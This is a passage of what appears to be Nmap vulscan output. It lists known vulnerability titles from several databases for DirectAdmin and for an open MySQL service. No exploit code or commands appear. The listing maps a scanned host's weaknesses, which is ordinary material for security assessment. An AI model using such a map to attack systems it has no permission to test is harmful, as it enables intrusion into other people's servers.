19336| [CVE-2007-3501] Cross-site scripting (XSS) vulnerability in CMD_USER_STATS in DirectAdmin 1.30.1 and earlier allows remote attackers to inject arbitrary web script or HTML via the domain parameter, a different vector than CVE-2007-1508.
19337| [CVE-2007-1926] Cross-site scripting (XSS) vulnerability in JBMC Software DirectAdmin before 1.293 does not properly display log files, which allows remote authenticated users to inject arbitrary web script or HTML via (1) http or (2) ftp requests logged in /var/log/directadmin/security.log
19338| [CVE-2006-5983] Multiple cross-site scripting (XSS) vulnerabilities in JBMC Software DirectAdmin 1.28.1 allow remote authenticated users to inject arbitrary web script or HTML via the (1) user parameter to (a) CMD_SHOW_RESELLER or (b) CMD_SHOW_USER in the Admin level
19339|
19340| SecurityFocus - https://www.securityfocus.com/bid/:
19341| [83952] DirectAdmin CVE-2006-2153 Cross-Site Scripting Vulnerability
19342| [63911] Installatron Plugin for DirectAdmin Insecure Temporary File Creation Vulnerability
19343| [63373] Installatron Plugin for DirectAdmin cURL Output Remote Privilege Escalation Vulnerability
19344| [62929] DirectAdmin Backup Multiple Security Vulnerabilities
19345| [61017] DirectAdmin Symlink Attack Multiple Remote Privilege Escalation Vulnerabilities
19346| [53281] DirectAdmin Multiple Cross Site Scripting Vulnerabilities
19347| [52848] RETIRED: DirectAdmin 'CMD_DOMAIN' Cross-Site Scripting Vulnerability
19348| [52845] JBMC Software DirectAdmin 'domain' Parameter Cross Site Scripting Vulnerability
19349| [47693] DirectAdmin 'mysql_backup' Folder Permissions Information Disclosure Vulnerability
19350| [47690] DirectAdmin Hard Link Local Privilege Escalation Vulnerability
19351| [38721] DirectAdmin 'CMD_DB_VIEW' Cross-Site Scripting Vulnerability
19352| [35450] DirectAdmin 'CMD_REDIRECT' Cross-Site Scripting Vulnerability
19353| [34678] DirectAdmin '/CMD_DB' Restore Action Local Privilege Escalation Vulnerability
19354| [34676] DirectAdmin '/CMD_DB' Backup Action Insecure Temporary File Creation Vulnerability
19355| [25607] DirectAdmin CMD_BANDWIDTH_BREAKDOWN Cross-Site Scripting Vulnerability
19356| [24688] DirectAdmin Domain Parameter Cross-Site Scripting Vulnerability
19357| [23254] DirectAdmin Logfile HTML Injection Vulnerability
19358| [22996] DirectAdmin CMD_USER_STATS Cross-Site Scripting Vulnerability
19359| [21049] DirectAdmin Multiple Cross-Site Scripting Vulnerabilities
19360|
19361| IBM X-Force - https://exchange.xforce.ibmcloud.com:
19362| [85490] DirectAdmin Backup System email account functionality symlink
19363| [85488] DirectAdmin Backup System symlink
19364| [74569] DirectAdmin CMD_DOMAIN cross-site scripting
19365| [72685] DirectAdmin domain parameter cross-site request forgery
19366| [67254] DirectAdmin MySQL information disclosure
19367| [67253] DirectAdmin hard link privilege escalation
19368| [56875] DirectAdmin name cross-site scripting
19369| [55181] DirectAdmin account cross-site request forgery
19370| [51292] DirectAdmin CMD_REDIRECT cross-site scripting
19371| [50167] DirectAdmin CMD_DB command execution
19372| [49416] DirectAdmin CMD_DB backup action symlink
19373| [36510] DirectAdmin user parameter cross-site scripting
19374| [35177] DirectAdmin domain parameter cross-site scripting
19375| [33390] DirectAdmin log file cross-site scripting
19376| [33023] DirectAdmin CMD_USER_STATS form cross-site scripting
19377| [30256] DirectAdmin user, TYPE, and name parameters cross-site scripting
19378|
19379| Exploit-DB - https://www.exploit-db.com:
19380| [29747] DirectAdmin 1.292 CMD_USER_STATS Cross-Site Scripting Vulnerability
19381| [29006] DirectAdmin 1.28/1.29 CMD_FTP_SHOW DOMAIN Parameter XSS
19382| [29005] DirectAdmin 1.28/1.29 CMD_EMAIL_LIST name Parameter XSS
19383| [29004] DirectAdmin 1.28/1.29 CMD_EMAIL_VACATION_MODIFY user Parameter XSS
19384| [29003] DirectAdmin 1.28/1.29 CMD_TICKET type Parameter XSS
19385| [29002] DirectAdmin 1.28/1.29 CMD_EMAIL_FORWARDER_MODIFY user Parameter XSS
19386| [29001] DirectAdmin 1.28/1.29 CMD_TICKET_CREATE TYPE Parameter XSS
19387| [29000] DirectAdmin 1.28/1.29 CMD_SHOW_USER user Parameter XSS
19388| [28999] DirectAdmin 1.28/1.29 CMD_SHOW_RESELLER user Parameter XSS
19389| [11813] DirectAdmin 1.34.4 - Multi CSRF vulnerability
19390| [11029] DirectAdmin <= 1.33.6 Symlink Permission Bypass
19391| [10779] DirectAdmin 1.34.0 - CSRF Create Administrator Vulnerability
19392|
19393| OpenVAS (Nessus) - http://www.openvas.org:
19394| No findings
19395|
19396| SecurityTracker - https://www.securitytracker.com:
19397| [1028744] DirectAdmin Backup System Flaws Let Local Users Gain Elevated Privileges
19398|
19399| OSVDB - http://www.osvdb.org:
19400| [94899] DirectAdmin Backup System Unspecified Email Account Function Symlink Local Privilege Escalation
19401| [94898] DirectAdmin Backup System Unspecified Symlink Arbitrary File Manipulation Local Privilege Escalation
19402| [80919] DirectAdmin CMD_DOMAIN Multiple Parameter XSS
19403| [72120] DirectAdmin mysql_backups Folder MySQL Database Backup Local Disclosure
19404| [72119] DirectAdmin Backup Creation Hard Link Check Weakness Local Privilege Escalation
19405| [62914] DirectAdmin CMD_DB_VIEW name Parameter XSS
19406| [61395] DirectAdmin Admin Account Creation CSRF
19407| [55296] DirectAdmin CMD_REDIRECT URL Parameter XSS
19408| [54015] DirectAdmin CMD_DB name Parameter Shell Metacharacter Arbitrary Command Execution
19409| [54014] DirectAdmin CMD_DB Database Backup Request Temporary File Symlink Arbitrary File Overwrite
19410| [36999] DirectAdmin CMD_BANDWIDTH_BREAKDOWN user Parameter XSS
19411| [36339] DirectAdmin CMD_USER_STATS domain Parameter XSS
19412| [34687] DirectAdmin http/ftp XSS Log Viewer Data Injection
19413| [34273] DirectAdmin CMD_USER_STATS RESULT Parameter XSS
19414| [32676] DirectAdmin CMD_FTP_SHOW DOMAIN Parameter XSS
19415| [32675] DirectAdmin CMD_EMAIL_LIST name Parameter XSS
19416| [32674] DirectAdmin CMD_EMAIL_VACATION_MODIFY user Parameter XSS
19417| [32673] DirectAdmin CMD_TICKET type Parameter XSS
19418| [32672] DirectAdmin CMD_EMAIL_FORWARDER_MODIFY user Parameter XSS
19419| [32671] DirectAdmin CMD_TICKET_CREATE TYPE Parameter XSS
19420| [32670] DirectAdmin CMD_SHOW_USER user Parameter XSS
19421| [32669] DirectAdmin CMD_SHOW_RESELLER user Parameter XSS
19422| [25138] DirectAdmin HTM_PASSWD domain Parameter XSS
19423|_
194243306/tcp open mysql MySQL (unauthorized)
19425| vulscan: VulDB - https://vuldb.com:
19426| [141414] LibreNMS up to 1.47 inventory.inc.php mysqli_escape_real_string Parameter cross site scripting
19427| [140101] Yandex ClickHouse MySQL Client information disclosure
19428| [139468] cPanel up to 60.0.24 MySQL Upgrade File privilege escalation
19429| [139350] cPanel up to 64.0.20 convert_roundcube_mysql2sqlite privilege escalation
19430| [139349] cPanel up to 64.0.20 convert_roundcube_mysql2sqlite privilege escalation
19431| [139308] cPanel up to 67.9999.102 WHM MySQL Password Change Interfaces Stored cross site scripting
19432| [138305] SaltStack Salt 2018.3/2019.2 mysqluser_chpass sql injection
19433| [138102] Oracle MySQL Server up to 8.0.16 InnoDB unknown vulnerability
19434| [138101] Oracle MySQL Server up to 8.0.16 Privileges unknown vulnerability
19435| [138100] Oracle MySQL Server up to 5.6.44/5.7.18 Privileges unknown vulnerability
19436| [138099] Oracle MySQL Server up to 5.6.44/5.7.26/8.0.16 Compiling information disclosure
19437| [138098] Oracle MySQL Server up to 5.7.26/8.0.16 Audit Plug-in unknown vulnerability
19438| [138097] Oracle MySQL Server up to 5.7.26/8.0.16 Client programs denial of service
19439| [138096] Oracle MySQL Server up to 8.0.16 Roles denial of service
19440| [138095] Oracle MySQL Server up to 8.0.16 Privileges denial of service
19441| [138094] Oracle MySQL Server up to 5.7.25/8.0.15 Replication denial of service
19442| [138093] Oracle MySQL Server up to 8.0.16 Options denial of service
19443| [138092] Oracle MySQL Server up to 8.0.16 Optimizer denial of service
19444| [138091] Oracle MySQL Server up to 8.0.16 Optimizer denial of service
19445| [138090] Oracle MySQL Server up to 8.0.16 Optimizer denial of service
19446| [138089] Oracle MySQL Server up to 8.0.16 Optimizer denial of service
19447| [138088] Oracle MySQL Server up to 8.0.16 Optimizer denial of service
19448| [138087] Oracle MySQL Server up to 8.0.16 Optimizer denial of service
19449| [138086] Oracle MySQL Server up to 8.0.16 Optimizer denial of service
19450| [138085] Oracle MySQL Server up to 5.7.26/8.0.16 Optimizer denial of service
19451| [138084] Oracle MySQL Server up to 5.7.26/8.0.16 Optimizer denial of service
19452| [138083] Oracle MySQL Server up to 8.0.12 GIS denial of service
19453| [138082] Oracle MySQL Server up to 8.0.16 FTS denial of service
19454| [138081] Oracle MySQL Server up to 8.0.16 DML denial of service
19455| [138080] Oracle MySQL Server up to 8.0.16 Components denial of service
19456| [138079] Oracle MySQL Server up to 5.6.44/5.7.26/8.0.16 Pluggable Auth denial of service
19457| [138078] Oracle MySQL Server up to 8.0.16 InnoDB denial of service
19458| [138077] Oracle MySQL Server up to 8.0.15 InnoDB denial of service
19459| [138076] Oracle MySQL Server up to 8.0.16 InnoDB denial of service
19460| [138074] Oracle MySQL Server up to 8.0.12 Roles denial of service
19461| [138073] Oracle MySQL Server up to 5.7.26/8.0.16 Audit Log denial of service
19462| [138072] Oracle MySQL Server up to 5.7.26/8.0.16 Privileges unknown vulnerability
19463| [138071] Oracle MySQL Server up to 5.7.23 Replication unknown vulnerability
19464| [138070] Oracle MySQL Server up to 5.6.44/5.7.26/8.0.16 Audit unknown vulnerability
19465| [138069] Oracle MySQL Server up to 5.7.26/8.0.16 InnoDB unknown vulnerability
19466| [138068] Oracle MySQL Workbench up to 8.0.16 OpenSSL information disclosure
19467| [138067] Oracle MySQL Server up to 5.6.44/5.7.26/8.0.16 XML denial of service
19468| [138066] Oracle MySQL Server up to 5.6.44/5.7.26/8.0.16 Parser denial of service
19469| [138065] Oracle MySQL Server up to 8.0.16 Optimizer denial of service
19470| [138064] Oracle MySQL Server up to 8.0.16 Optimizer denial of service
19471| [138063] Oracle MySQL Server up to 8.0.12 Data Dictionary denial of service
19472| [138062] Oracle MySQL Server up to 8.0.16 Charsets denial of service
19473| [138061] Oracle MySQL Server up to 8.0.16 Replication unknown vulnerability
19474| [138060] Oracle MySQL Server up to 8.0.16 InnoDB Cluster unknown vulnerability
19475| [138059] Oracle MySQL Enterprise Monitor up to 4.0.9/8.0.14 Spring Framework denial of service
19476| [138058] Oracle MySQL Server up to 5.7.26/8.0.15 cURL unknown vulnerability
19477| [133701] Oracle MySQL Server up to 8.0.15 Replication denial of service
19478| [133700] Oracle MySQL Server up to 8.0.15 Replication denial of service
19479| [133698] Oracle MySQL Server up to 8.0.15 Group Replication Plugin denial of service
19480| [133697] Oracle MySQL Server up to 8.0.15 Roles denial of service
19481| [133695] Oracle MySQL Server up to 8.0.15 Privileges denial of service
19482| [133691] Oracle MySQL Server up to 8.0.15 Replication denial of service
19483| [133687] Oracle MySQL Server up to 8.0.15 Optimizer denial of service
19484| [133686] Oracle MySQL Server up to 8.0.15 Optimizer denial of service
19485| [133685] Oracle MySQL Server up to 8.0.15 Optimizer denial of service
19486| [133684] Oracle MySQL Server up to 8.0.15 Optimizer denial of service
19487| [133683] Oracle MySQL Server up to 8.0.15 Optimizer denial of service
19488| [133682] Oracle MySQL Server up to 8.0.15 Optimizer denial of service
19489| [133681] Oracle MySQL Server up to 8.0.15 Optimizer denial of service
19490| [133680] Oracle MySQL Server up to 8.0.15 Optimizer denial of service
19491| [133677] Oracle MySQL Server up to 8.0.15 Information Schema denial of service
19492| [133676] Oracle MySQL Server up to 8.0.15 DDL denial of service
19493| [133675] Oracle MySQL Server up to 8.0.15 DDL denial of service
19494| [133672] Oracle MySQL Server up to 8.0.15 InnoDB denial of service
19495| [133668] Oracle MySQL Server up to 8.0.15 Replication denial of service
19496| [133666] Oracle MySQL Server up to 8.0.15 Options denial of service
19497| [133662] Oracle MySQL Connectors up to 8.0.15 Connector/J unknown vulnerability
19498| [133661] Oracle MySQL Server up to 8.0.15 Optimizer denial of service
19499| [133660] Oracle MySQL Server up to 8.0.15 Optimizer denial of service
19500| [133659] Oracle MySQL Server up to 8.0.15 Optimizer denial of service
19501| [129647] Oracle MySQL Server up to 5.7.24/8.0.13 Privileges denial of service
19502| [129646] Oracle MySQL Server up to 5.7.24/8.0.13 Privileges denial of service
19503| [129645] Oracle MySQL Server up to 5.6.42/5.7.24/8.0.13 Replication denial of service
19504| [129644] Oracle MySQL Server up to 5.7.24/8.0.13 Partition denial of service
19505| [129643] Oracle MySQL Server up to 8.0.13 Optimizer denial of service
19506| [129642] Oracle MySQL Server up to 5.6.42/5.7.24/8.0.13 Optimizer denial of service
19507| [129641] Oracle MySQL Server up to 5.6.42/5.7.24/8.0.13 Optimizer denial of service
19508| [129640] Oracle MySQL Server up to 5.7.24/8.0.13 Optimizer denial of service
19509| [129639] Oracle MySQL Server up to 5.6.42/5.7.24/8.0.13 DDL denial of service
19510| [129638] Oracle MySQL Server up to 8.0.13 DDL denial of service
19511| [129637] Oracle MySQL Server up to 8.0.13 DDL denial of service
19512| [129636] Oracle MySQL Server up to 8.0.13 Connection denial of service
19513| [129635] Oracle MySQL Server up to 5.7.24/8.0.13 InnoDB denial of service
19514| [129634] Oracle MySQL Server up to 8.0.13 InnoDB denial of service
19515| [129631] Oracle MySQL Server up to 8.0.13 Replication denial of service
19516| [129630] Oracle MySQL Server up to 5.6.42/5.7.24/8.0.13 Connection Handling denial of service
19517| [129629] Oracle MySQL Server up to 5.6.42/5.7.24/8.0.13 Parser denial of service
19518| [129628] Oracle MySQL Server up to 5.7.24/8.0.13 Parser denial of service
19519| [129627] Oracle MySQL Server up to 5.6.42/5.7.24/8.0.13 PS denial of service
19520| [129626] Oracle MySQL Server up to 5.6.42/5.7.24/8.0.13 Optimizer denial of service
19521| [129625] Oracle MySQL Server up to 8.0.13 Privileges unknown vulnerability
19522| [129624] Oracle MySQL Server up to 5.6.42/5.7.24/8.0.13 Replication unknown vulnerability
19523| [129623] Oracle MySQL Workbench up to 8.0.13 OpenSSL denial of service
19524| [129622] Oracle MySQL Connectors up to 2.1.8/8.0.13 Connector/Python unknown vulnerability
19525| [129621] Oracle MySQL Workbench up to 8.0.13 unknown vulnerability
19526| [127905] Open Dental up to 18.3 MySQL Database Default Credentials weak authentication
19527| [127404] Drobo 5N2 NAS 4.0.5-13.28.96115 MySQL API Error Page cross site scripting
19528| [127403] Drobo 5N2 NAS 4.0.5-13.28.96115 /mysql/api/droboapp/data information disclosure
19529| [127400] Drobo 5N2 NAS 4.0.5-13.28.96115 Access Control /mysql/api/logfile.php Parameter information disclosure
19530| [127396] Drobo 5N2 NAS 4.0.5-13.28.96115 Access Control /mysql/api/drobo.php information disclosure
19531| [127395] Drobo 5N2 NAS 4.0.5-13.28.96115 Access Control /mysql/api/diags.php Parameter information disclosure
19532| [127350] Dell OpenManage Network Manager up to 6.4.x MySQL privilege escalation
19533| [126982] LAOBANCMS 2.0 install/mysql_hy.php directory traversal
19534| [126687] LAOBANCMS 2.0 mysql_hy.php privilege escalation
19535| [125937] mysql-binuuid-rails up to 1.1.0 Database Column sql injection
19536| [125825] ThinkPHP 3.2.4 Mysql.class.php parseKey Parameter sql injection
19537| [125568] Oracle MySQL Server up to 8.0.12 Privileges unknown vulnerability
19538| [125567] Oracle MySQL Server up to 5.7.23/8.0.12 Logging denial of service
19539| [125566] Oracle MySQL Server up to 5.7.23/8.0.12 InnoDB denial of service
19540| [125565] Oracle MySQL Server up to 8.0.12 Windows denial of service
19541| [125564] Oracle MySQL Server up to 5.5.61/5.6.41/5.7.23/8.0.12 Storage Engines denial of service
19542| [125563] Oracle MySQL Server up to 8.0.12 Roles denial of service
19543| [125562] Oracle MySQL Server up to 5.6.41/5.7.23/8.0.12 RBR denial of service
19544| [125561] Oracle MySQL Server up to 5.7.23/8.0.12 Partition denial of service
19545| [125560] Oracle MySQL Server up to 8.0.12 Optimizer denial of service
19546| [125559] Oracle MySQL Server up to 5.6.41/5.7.23/8.0.12 Memcached denial of service
19547| [125558] Oracle MySQL Server up to 8.0.12 JSON denial of service
19548| [125557] Oracle MySQL Server up to 8.0.12 Information Schema denial of service
19549| [125556] Oracle MySQL Server up to 8.0.12 DDL denial of service
19550| [125555] Oracle MySQL Server up to 5.7.23/8.0.12 InnoDB denial of service
19551| [125554] Oracle MySQL Server up to 5.7.23/8.0.12 InnoDB denial of service
19552| [125553] Oracle MySQL Server up to 5.7.23/8.0.12 InnoDB denial of service
19553| [125552] Oracle MySQL Server up to 5.7.23/8.0.12 InnoDB denial of service
19554| [125551] Oracle MySQL Server up to 5.7.23/8.0.12 Partition denial of service
19555| [125549] Oracle MySQL Server up to 5.7.23/8.0.12 Optimizer denial of service
19556| [125548] Oracle MySQL Server up to 5.6.41/5.7.23/8.0.12 Merge denial of service
19557| [125547] Oracle MySQL Server up to 8.0.12 DDL denial of service
19558| [125546] Oracle MySQL Server up to 5.7.23/8.0.12 InnoDB denial of service
19559| [125545] Oracle MySQL Server up to 5.7.23/8.0.12 Audit denial of service
19560| [125544] Oracle MySQL Server up to 8.0.12 Parser denial of service
19561| [125543] Oracle MySQL Server up to 5.5.61/5.6.41/5.7.23/8.0.12 Parser denial of service
19562| [125542] Oracle MySQL Server up to 8.0.12 Optimizer denial of service
19563| [125541] Oracle MySQL Server up to 8.0.12 Optimizer denial of service
19564| [125540] Oracle MySQL Server up to 8.0.12 DML denial of service
19565| [125539] Oracle MySQL Server up to 5.6.41/5.7.23/8.0.12 InnoDB denial of service
19566| [125538] Oracle MySQL Server up to 5.6.41/5.7.23/8.0.12 InnoDB denial of service
19567| [125537] Oracle MySQL Server up to 5.6.41/5.7.23/8.0.12 InnoDB denial of service
19568| [125536] Oracle MySQL Server up to 5.7.23/8.0.12 Parser denial of service
19569| [125535] Oracle MySQL Server up to 5.5.61/5.6.41/5.7.23/8.0.12 InnoDB unknown vulnerability
19570| [125534] Oracle MySQL Enterprise Monitor up to 3.4.9.4237/4.0.6.5281/8.0.2.8191 Monitoring unknown vulnerability
19571| [125533] Oracle MySQL Connectors up to 8.0.12 Connector/J unknown vulnerability
19572| [125532] Oracle MySQL Enterprise Monitor up to 3.4.9.4237/4.0.6.5281/8.0.2.8191 Monitoring unknown vulnerability
19573| [125531] Oracle MySQL Enterprise Monitor up to 3.4.9.4237/4.0.6.5281/8.0.2.8191 Monitoring unknown vulnerability
19574| [125415] Oracle Enterprise Manager for MySQL Database 13.2 EM Plugin unknown vulnerability
19575| [122549] PHP up to 7.1.5 mysqli_real_escape_string memory corruption
19576| [122201] mysql_user Module up to 2.2.0 on Ansible Password Change weak authentication
19577| [121802] Oracle MySQL Server up to 8.0.11 DDL unknown vulnerability
19578| [121800] Oracle MySQL Server up to 5.5.60/5.6.40/5.7.22 Encryption weak encryption
19579| [121799] Oracle MySQL Server up to 5.5.60/5.6.40/5.7.22 Options unknown vulnerability
19580| [121798] Oracle MySQL Workbench up to 6.3.10 Encryption weak encryption
19581| [121797] Oracle MySQL Server up to 5.7.22/8.0.11 Privileges unknown vulnerability
19582| [121796] Oracle MySQL Server up to 5.5.60/5.6.40/5.7.22 MyISAM information disclosure
19583| [121795] Oracle MySQL Server up to 8.0.11 Privileges denial of service
19584| [121794] Oracle MySQL Server up to 5.5.60 Privileges denial of service
19585| [121793] Oracle MySQL Server up to 8.0.11 Replication denial of service
19586| [121792] Oracle MySQL Server up to 5.7.22 DML denial of service
19587| [121791] Oracle MySQL Server up to 8.0.11 DDL denial of service
19588| [121790] Oracle MySQL Server up to 8.0.11 DDL denial of service
19589| [121789] Oracle MySQL Server up to 5.7.22/8.0.11 DDL denial of service
19590| [121788] Oracle MySQL Server up to 5.7.22/8.0.11 DDL denial of service
19591| [121787] Oracle MySQL Server up to 8.0.11 InnoDB denial of service
19592| [121786] Oracle MySQL Server up to 5.7.22 Audit Log denial of service
19593| [121785] Oracle MySQL Client up to 5.5.60/5.6.40/5.7.22/8.0.11 Client Programs denial of service
19594| [121784] Oracle MySQL Server up to 5.6.40/5.7.22/8.0.11 Memcached denial of service
19595| [121783] Oracle MySQL Server up to 8.0.11 Roles denial of service
19596| [121782] Oracle MySQL Workbench up to 8.0.11 denial of service
19597| [121781] Oracle MySQL Server up to 8.0.11 Optimizer denial of service
19598| [121780] Oracle MySQL Server up to 5.6.40/5.7.22/8.0.11 Installing denial of service
19599| [121779] Oracle MySQL Server up to 5.7.22/8.0.11 DML denial of service
19600| [121778] Oracle MySQL Server up to 5.7.22/8.0.11 InnoDB denial of service
19601| [121777] Oracle MySQL Server up to 5.5.60/5.6.40/5.7.22 Client mysqldump denial of service
19602| [121776] Oracle MySQL Enterprise Monitor up to 3.4.7.4297/4.0.4.5235/8.0.0.8131 Monitoring denial of service
19603| [121775] Oracle MySQL Connectors up to 5.3.10/8.0.11 Connector/ODBC denial of service
19604| [121774] Oracle MySQL Server up to 5.6.40/5.7.22/8.0.11 InnoDB denial of service
19605| [121773] Oracle MySQL Workbench up to 8.0.11 unknown vulnerability
19606| [121772] Oracle MySQL Enterprise Monitor up to 3.4.7.4297/4.0.4.5235/8.0.0.8131 Service Manager unknown vulnerability
19607| [121613] Oracle Enterprise Manager for MySQL Database up to 13.2.2.0.0 EM Plugin unknown vulnerability
19608| [120277] query-mysql 0.0.0/0.0.1/0.0.2 on Node.js sql injection
19609| [118340] mysqljs on Node.js Backdoor privilege escalation
19610| [118305] MySQL Module up to v2.0.0-alpha7 on Node.js mysql.escape sql injection
19611| [117517] MySQL Multi-Master Replication Manager 2.2.1 on Solaris mmm_agentd send_arp MMM Protocol Message command injection
19612| [117516] MySQL Multi-Master Replication Manager 2.2.1 on FreeBSD mmm_agentd clear_ip MMM Protocol Message command injection
19613| [117515] MySQL Multi-Master Replication Manager 2.2.1 on Solaris mmm_agentd clear_ip MMM Protocol Message command injection
19614| [117514] MySQL Multi-Master Replication Manager 2.2.1 on Linux mmm_agentd clear_ip MMM Protocol Message command injection
19615| [117513] MySQL Multi-Master Replication Manager 2.2.1 on FreeBSD mmm_agentd add_ip MMM Protocol Message command injection
19616| [117512] MySQL Multi-Master Replication Manager 2.2.1 on Solaris mmm_agentd add_ip MMM Protocol Message command injection
19617| [117511] MySQL Multi-Master Replication Manager 2.2.1 on Linux mmm_agentd add_ip MMM Protocol Message command injection
19618| [117510] MySQL Multi-Master Replication Manager 2.2.1 mmm_agentd _execute MMM Protocol Message command injection
19619| [117387] CSP MySQL User Manager 2.3.1 Username sql injection
19620| [116762] Oracle MySQL Server up to 5.5.59/5.6.39/5.7.21 DDL information disclosure
19621| [116761] Oracle MySQL Server up to 5.5.59/5.6.39/5.7.21 Locking denial of service
19622| [116759] Oracle MySQL Server up to 5.7.21 Group Replication GCS denial of service
19623| [116758] Oracle MySQL Server up to 5.7.21 Pluggable Auth denial of service
19624| [116757] Oracle MySQL Server up to 5.7.21 Performance Schema denial of service
19625| [116756] Oracle MySQL Server up to 5.7.21 Optimizer denial of service
19626| [116755] Oracle MySQL Server up to 5.5.59/5.6.39/5.7.21 Optimizer denial of service
19627| [116754] Oracle MySQL Server up to 5.7.21 Optimizer denial of service
19628| [116753] Oracle MySQL Server up to 5.7.21 Optimizer denial of service
19629| [116752] Oracle MySQL Server up to 5.7.21 DML denial of service
19630| [116751] Oracle MySQL Server up to 5.5.59/5.6.39/5.7.21 Privileges denial of service
19631| [116750] Oracle MySQL Server up to 5.7.21 InnoDB denial of service
19632| [116749] Oracle MySQL Server up to 5.7.21 InnoDB denial of service
19633| [116748] Oracle MySQL Server up to 5.6.39/5.7.21 InnoDB denial of service
19634| [116747] Oracle MySQL Server up to 5.7.21 InnoDB denial of service
19635| [116745] Oracle MySQL Server up to 5.7.21 Optimizer denial of service
19636| [116744] Oracle MySQL Server up to 5.6.39/5.7.21 InnoDB denial of service
19637| [116743] Oracle MySQL Server up to 5.7.21 InnoDB denial of service
19638| [116742] Oracle MySQL Server up to 5.5.59/5.6.39/5.7.21 Client programs denial of service
19639| [116741] Oracle MySQL Enterprise Monitor up to 3.3.7.3306/3.4.5.4248/4.0.2.5168 Monitoring: Agent (OpenSSL) information disclosure
19640| [116740] Oracle MySQL Server up to 5.7.21 Optimizer denial of service
19641| [116739] Oracle MySQL Server up to 5.7.21 Optimizer denial of service
19642| [116738] Oracle MySQL Server up to 5.5.59/5.6.39/5.7.21 DDL denial of service
19643| [116737] Oracle MySQL Server up to 5.6.39/5.7.21 Privileges denial of service
19644| [116736] Oracle MySQL Server up to 5.5.59/5.6.39/5.7.21 InnoDB denial of service
19645| [116735] Oracle MySQL Server up to 5.6.39/5.7.21 InnoDB denial of service
19646| [116734] Oracle MySQL Server up to 5.6.39/5.7.21 InnoDB denial of service
19647| [116733] Oracle MySQL Server up to 5.6.39 GIS Extension denial of service
19648| [116622] Oracle Enterprise Manager for MySQL Database 12.1.0.4 EM Plugin: General (Apache Tomcat) unknown vulnerability
19649| [116620] Oracle Enterprise Manager for MySQL Database 12.1.0.4 EM Plugin: General (Spring Framework) unknown vulnerability
19650| [116619] Oracle Enterprise Manager for MySQL Database 12.1.0.4 EM Plugin: General unknown vulnerability
19651| [115836] Juniper Junos Space up to 13.3R1.7 MySQL Server Default Credentials weak authentication
19652| [115216] MySQL for PCF Tiles up to 1.7.9 AWS Access Key privilege escalation
19653| [114055] Couch up to 2.0 mysql2i.func.php Request information disclosure
19654| [112112] Oracle MySQL Server up to 5.6.38/5.7.20 Performance Schema information disclosure
19655| [112111] Oracle MySQL Server up to 5.6.38/5.7.20 Performance Schema denial of service
19656| [112110] Oracle MySQL Server up to 5.7.20 Optimizer denial of service
19657| [112109] Oracle MySQL Server up to 5.7.20 Optimizer denial of service
19658| [112108] Oracle MySQL Server up to 5.7.20 InnoDB denial of service
19659| [112107] Oracle MySQL Server up to 5.7.20 DML denial of service
19660| [112106] Oracle MySQL Server up to 5.7.20 DML denial of service
19661| [112105] Oracle MySQL Server up to 5.7.20 DML denial of service
19662| [112104] Oracle MySQL Server up to 5.6.38/5.7.19 Partition denial of service
19663| [112103] Oracle MySQL Server up to 5.6.38/5.7.20 Replication denial of service
19664| [112102] Oracle MySQL Server up to 5.6.38/5.7.20 Packaging information disclosure
19665| [112101] Oracle MySQL Enterprise Monitor up to 3.3.6.3293/3.4.4.4226/4.0.0.5135 Monitoring information disclosure
19666| [112100] Oracle MySQL Connectors up to 5.3.9 ODBC Connector information disclosure
19667| [112099] Oracle MySQL Server up to 5.5.58/5.6.38/5.7.20 Optimizer denial of service
19668| [112098] Oracle MySQL Server up to 5.5.58/5.6.38/5.7.20 Optimizer denial of service
19669| [112097] Oracle MySQL Server up to 5.5.58/5.6.38/5.7.20 Optimizer denial of service
19670| [112096] Oracle MySQL Server up to 5.6.38/5.7.20 GIS denial of service
19671| [112095] Oracle MySQL Server up to 5.5.58/5.6.38/5.7.20 DDL denial of service
19672| [112094] Oracle MySQL Server up to 5.6.38/5.7.20 Privileges denial of service
19673| [112093] Oracle MySQL Server up to 5.6.38/5.7.20 InnoDB denial of service
19674| [112092] Oracle MySQL Server up to 5.6.38/5.7.20 Stored Procedure denial of service
19675| [112091] Oracle MySQL Server up to 5.5.58/5.6.38/5.7.19 Partition denial of service
19676| [112090] Oracle MySQL Server up to 5.6.38/5.7.20 Privileges denial of service
19677| [112089] Oracle MySQL Connectors up to 6.9.9/6.10.4 Connector/Net denial of service
19678| [112088] Oracle MySQL Enterprise Monitor up to 3.3.6.3293/3.4.4.4226/4.0.0.5135 Monitoring privilege escalation
19679| [110974] puppetlabs-mysql up to 3.6.0 Parameter weak authentication
19680| [108192] Oracle MySQL Server up to 5.7.18 InnoDB denial of service
19681| [108190] Oracle MySQL Server up to 5.6.37/5.7.19 InnoDB denial of service
19682| [108189] Oracle MySQL Server up to 5.7.18 Stored Procedure denial of service
19683| [108188] Oracle MySQL Server up to 5.7.19 Replication denial of service
19684| [108187] Oracle MySQL Server up to 5.6.37/5.7.19 Optimizer denial of service
19685| [108186] Oracle MySQL Server up to 5.6.36/5.7.18 Optimizer denial of service
19686| [108185] Oracle MySQL Server up to 5.6.37/5.7.19 Optimizer denial of service
19687| [108184] Oracle MySQL Server up to 5.6.37/5.7.19 Memcached denial of service
19688| [108183] Oracle MySQL Server up to 5.7.19 InnoDB denial of service
19689| [108182] Oracle MySQL Server up to 5.7.19 FTS denial of service
19690| [108181] Oracle MySQL Server up to 5.7.18 DML denial of service
19691| [108180] Oracle MySQL Server up to 5.7.19 Group Replication GCS denial of service
19692| [108179] Oracle MySQL Server up to 5.6.37/5.7.19 Performance Schema denial of service
19693| [108178] Oracle MySQL Connectors up to 6.9.9 Connector/Net denial of service
19694| [108177] Oracle MySQL Connectors up to 6.9.9 Connector/Net unknown vulnerability
19695| [108176] Oracle MySQL Server up to 5.5.57/5.6.37/5.7.11 Optimizer denial of service
19696| [108175] Oracle MySQL Server up to 5.7.19 Optimizer denial of service
19697| [108174] Oracle MySQL Server up to 5.6.37/5.7.19 FTS denial of service
19698| [108173] Oracle MySQL Server up to 5.5.57/5.6.37/5.7.19 DDL denial of service
19699| [108172] Oracle MySQL Server up to 5.5.57/5.6.37/5.7.19 Client programs information disclosure
19700| [108171] Oracle MySQL Server up to 5.6.35/5.7.18 OpenSSL denial of service
19701| [108170] Oracle MySQL Server up to 5.6.37/5.7.19 Pluggable Auth denial of service
19702| [108169] Oracle MySQL Enterprise Monitor up to 3.2.8.2223/3.3.4.3247/3.4.2.4181 Apache Tomcat unknown vulnerability
19703| [108168] Oracle MySQL Enterprise Monitor up to 3.2.8.2223/3.3.4.3247/3.4.2.4181 Web unknown vulnerability
